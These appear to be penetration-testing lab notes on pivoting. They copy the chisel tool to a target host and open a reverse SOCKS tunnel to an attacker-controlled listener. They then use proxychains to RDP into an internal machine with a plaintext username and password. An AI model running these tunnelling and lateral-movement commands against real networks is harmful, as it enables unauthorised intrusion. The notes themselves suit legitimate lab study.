scp chisel ubuntu@10.129.202.64:/tmp
sudo ./chisel server --reverse -v -p 1234 --socks5
or
sudo ./chisel server --reverse
./chisel client -v 10.10.14.199:1234 R:socks
or
./chisel client 10.10.14.199:8080 R:socks
sudo subl /usr/local/etc/proxychains.conf
cd ~/proxychains
./proxychains4 xfreerdp /v:172.16.5.19 /u:victor /p:pass@123